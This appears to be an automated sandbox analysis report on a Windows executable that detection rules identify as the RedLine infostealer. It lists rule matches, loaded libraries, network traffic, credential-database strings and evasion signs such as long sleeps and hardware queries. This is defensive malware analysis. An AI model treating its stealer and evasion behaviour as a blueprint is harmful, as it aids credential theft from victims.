                      Source: VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F42000.00000004.00000800.00020000.00000000.sdmp, tmpB7CD.tmp.0.dr, tmpB7DE.tmp.0.dr, tmpB7BC.tmp.0.dr, tmpEECF.tmp.0.dr, tmp805D.tmp.0.dr, tmp806E.tmp.0.dr, tmpB80E.tmp.0.dr, tmpEF01.tmp.0.dr, tmpB7EE.tmp.0.dr, tmpEEF0.tmp.0.dr, tmpEEE0.tmp.0.dr, tmp807F.tmp.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F42000.00000004.00000800.00020000.00000000.sdmp, tmpB7CD.tmp.0.dr, tmpB7DE.tmp.0.dr, tmpB7BC.tmp.0.dr, tmpEECF.tmp.0.dr, tmp805D.tmp.0.dr, tmp806E.tmp.0.dr, tmpB80E.tmp.0.dr, tmpEF01.tmp.0.dr, tmpB7EE.tmp.0.dr, tmpEEF0.tmp.0.dr, tmpEEE0.tmp.0.dr, tmp807F.tmp.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: VXB84UvyHp.exeString found in binary or memory: https://ipinfo.io/ip%appdata%
                      Source: VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F42000.00000004.00000800.00020000.00000000.sdmp, tmpB7CD.tmp.0.dr, tmpB7DE.tmp.0.dr, tmpB7BC.tmp.0.dr, tmpEECF.tmp.0.dr, tmp805D.tmp.0.dr, tmp806E.tmp.0.dr, tmpB80E.tmp.0.dr, tmpEF01.tmp.0.dr, tmpB7EE.tmp.0.dr, tmpEEF0.tmp.0.dr, tmpEEE0.tmp.0.dr, tmp807F.tmp.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F9B000.00000004.00000800.00020000.00000000.sdmp, VXB84UvyHp.exe, 00000000.00000002.1815291756.0000000003F42000.00000004.00000800.00020000.00000000.sdmp, tmpB7CD.tmp.0.dr, tmpB7DE.tmp.0.dr, tmpB7BC.tmp.0.dr, tmpEECF.tmp.0.dr, tmp805D.tmp.0.dr, tmp806E.tmp.0.dr, tmpB80E.tmp.0.dr, tmpEF01.tmp.0.dr, tmpB7EE.tmp.0.dr, tmpEEF0.tmp.0.dr, tmpEEE0.tmp.0.dr, tmp807F.tmp.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443

                      System Summary

                      barindex
                      Source: VXB84UvyHp.exe, type: SAMPLEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: VXB84UvyHp.exe, type: SAMPLEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                      Source: VXB84UvyHp.exe, type: SAMPLEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0.0.VXB84UvyHp.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: 0.0.VXB84UvyHp.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
                      Source: 0.0.VXB84UvyHp.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 00000000.00000000.1688057182.0000000000AB2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: Process Memory Space: VXB84UvyHp.exe PID: 7296, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeCode function: 0_2_02D2E7B00_2_02D2E7B0
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeCode function: 0_2_02D2DC900_2_02D2DC90
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeCode function: 0_2_066E96280_2_066E9628
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeCode function: 0_2_066E44680_2_066E4468
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeCode function: 0_2_066E12100_2_066E1210
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeCode function: 0_2_066E33200_2_066E3320
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeCode function: 0_2_066ED1080_2_066ED108
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeCode function: 0_2_066EDD000_2_066EDD00
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002F00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefirefox.exe0 vs VXB84UvyHp.exe
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002F00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs VXB84UvyHp.exe
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002F00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs VXB84UvyHp.exe
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002F00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs VXB84UvyHp.exe
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002F00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs VXB84UvyHp.exe
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002F00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs VXB84UvyHp.exe
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002F00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEXPLORE.EXED vs VXB84UvyHp.exe
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002F00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\080904B0\\OriginalFilename vs VXB84UvyHp.exe
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813975297.0000000002F00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs VXB84UvyHp.exe
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813026433.00000000011BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs VXB84UvyHp.exe
                      Source: VXB84UvyHp.exe, 00000000.00000000.1688057182.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs VXB84UvyHp.exe
                      Source: VXB84UvyHp.exeBinary or memory string: OriginalFilenameImplosions.exe4 vs VXB84UvyHp.exe
                      Source: VXB84UvyHp.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: VXB84UvyHp.exe, type: SAMPLEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: VXB84UvyHp.exe, type: SAMPLEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                      Source: VXB84UvyHp.exe, type: SAMPLEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 0.0.VXB84UvyHp.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: 0.0.VXB84UvyHp.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                      Source: 0.0.VXB84UvyHp.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 00000000.00000000.1688057182.0000000000AB2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: Process Memory Space: VXB84UvyHp.exe PID: 7296, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/43@1/2
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeFile created: C:\Users\user\AppData\Local\Temp\tmp487F.tmpJump to behavior
                      Source: VXB84UvyHp.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: VXB84UvyHp.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: tmp801B.tmp.0.dr, tmp802C.tmp.0.dr, tmp804D.tmp.0.dr, tmp803C.tmp.0.dr, tmp487F.tmp.0.dr, tmp4880.tmp.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: VXB84UvyHp.exeVirustotal: Detection: 83%
                      Source: VXB84UvyHp.exeReversingLabs: Detection: 95%
                      Source: unknownProcess created: C:\Users\user\Desktop\VXB84UvyHp.exe "C:\Users\user\Desktop\VXB84UvyHp.exe"
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeSection loaded: ntmarta.dllJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: VXB84UvyHp.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: VXB84UvyHp.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: VXB84UvyHp.exeStatic PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 16383
                      Source: unknownNetwork traffic detected: HTTP traffic on port 16383 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 16383
                      Source: unknownNetwork traffic detected: HTTP traffic on port 16383 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 16383 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 16383
                      Source: unknownNetwork traffic detected: HTTP traffic on port 16383 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 16383
                      Source: unknownNetwork traffic detected: HTTP traffic on port 16383 -> 49734
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeMemory allocated: 2CE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeMemory allocated: 2DA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeMemory allocated: 4DA0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeWindow / User API: threadDelayed 1634Jump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeWindow / User API: threadDelayed 5072Jump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exe TID: 7448Thread sleep time: -23058430092136925s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exe TID: 7388Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exe TID: 7352Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: VXB84UvyHp.exe, 00000000.00000002.1813026433.0000000001267000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeQueries volume information: C:\Users\user\Desktop\VXB84UvyHp.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\VXB84UvyHp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
